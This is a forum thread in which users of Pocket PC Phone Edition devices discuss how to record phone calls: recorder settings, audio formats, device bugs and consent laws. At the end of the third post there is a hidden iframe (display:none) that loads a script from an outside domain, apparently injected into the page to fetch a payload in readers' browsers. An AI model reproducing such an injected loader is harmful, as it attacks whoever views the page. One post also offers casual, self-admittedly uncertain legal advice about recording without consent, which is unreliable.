+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

How can I record a phone call with the Phone Edition?

Before we discuss the answer, please be adviced that it is illegal in some locations to record a phone call without notifying the other party that you are doing so. You are responsible for finding out what the local laws are that apply to recording telephone conversations.

How to record a phone call

I tried this before, but it didn't work. However, after your post I decided to play with it and found that you have to start the recording after you initiate the telephone call. It appears that the built-in audio recorder program will stop recording if you start it recording first and then switch to the Phone application to dial a number. You therefore must dial the telephone number, launch or switch to the audio recorder, and then press the record button to begin recording the conversation.

Furthermore, I've also found that you can record directly to an SD/MMC card by selecting "Storage card 1 (if available)" from the "Save to:" drop down selection box in the "Options" dialog window accessible from the Tools->Options menu in the Notes program. Also, if you change the click on the "Global Input Options" link at the bottom of the "Options" dialog window, switch to the "Options" tab in the "Input" options window that appears, and select "GSM 6.10: 8,00 Hz, Mono (2KB/s)" from the "Voice recording format:", you get the best audio quality from a phone recording. File size appears to be around 100KB per 1 min which is reasonable.

If anyone is using PocketInformant.... it automatically launches a note taking session for you, with a record button, when you start a phone call. I have used it to record voicemail messages onto my Phone Edition so that I could later write down what was said without having to call my voicemail number back. It requires one click of a button during the call.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

Regarding the legal aspects...

Only five states require "all party consent" to record a conversation (it applies in person also). The other 45 states just require that ONE party in the conversation consent. If you are part of the conversation and the person recording, then you've given the consent. This means you can't record a conversation you are not a party to, however, unless one of those people consents.

I can't remember the states where all-party consent is required, but I do know for a fact that California is one of them. I think all the others were East Coast states. I know for a fact single-party consent is the law in Arizona and Nevada.

What happens if you do it anyway? Well, if nobody finds out, that's fine. If they do, they could sue you for damages, and in some states you could be arrested for committing a felony offense. The evidence gathered is inadmissible in court. If you "covered your ass" using this, the person covered could actually sue you and win even if they were in the wrong on the actual issue recorded. So you expose a liar at work, and he gets fired instead of you. He could sue you for lost wages and damages. In California I believe the statute allows for punitive damages of three times actual damages.

Angry Recording a phone call...

It seems like my device (samsung sph-i700) will only record on speaker phone because then the call will reverb into the microphone. Threrefore it's not necessarily recording the phone call it's recording the reverb from the phone call. So how do I get my device to record the actual phone call. I could be somewhere trying to record and some unexpected external noise could adversely affect the integrity of my digital reproduction of my phone call.

On the Samsung i700, when I hit the record button while I'm on the phone, the other party cannot hear me anymore but when I stop the recording, they can hear me again. Has anyone experience this issue and how do I resolve this? This must be a bug or something on the i700.

I was able to record a phone conversation fine with no problem on the Hitachi G1000 and Toshiba SP2032.

I'm guessing it's a bug in that device. On my XDA I use the record function regularly with no issue, and I don't use it with the speakerphone.
    --
    Carlos Alvarez, Chandler, AZ

"One cannot expect freedom of speech without the burden of thought."

I have had the same experience as Fahfahn and TheCrow above. When I try reconding a call I can here my side of the conversation, not the other side (as when i try to record voice mail) and when talking live to someone, they are unable to here me when I have the record button down.

Is there someone who has had a different experience with the Samsung i700? If so are there any set up issues you know about.

Saving phone conversations as raw audio

After you have it saved as a MS Outlook Note, you can extract the audio into a raw audio file using this website: http://www.msg2wav.com

limit?

Hi,
    is voice recording limited by something? (capacity of card etc.)
    Thanx

Utilize Bluetooth PC?

Suppose your pdaphone had BT and most nowadays do. Would recording a phone call be a lot easier if you had, say, a laptop computer that had BT as well? In other words, is it possible to rig up the computer as you would a BT headset thereby able to use whatever PC software to record the call. The mic and speaker on the pdaphone would still have to be enabled so that you could have the conversation while it is being recorded on the computer. Alternatively, the pdaphone will have a BT connection with both the headphone and computer for handsfree operation while recording. Do all the software required exist today?

great to know... i've been wondering about this for weeks.

if the phone is capable of digitizing the phone call audio, is it not possible to have a program retrieve voicemail from the telco service and store the message in a voicemail inbox as wav/mp3 files ?... anyone know if this already exists ?

cheers
    ramone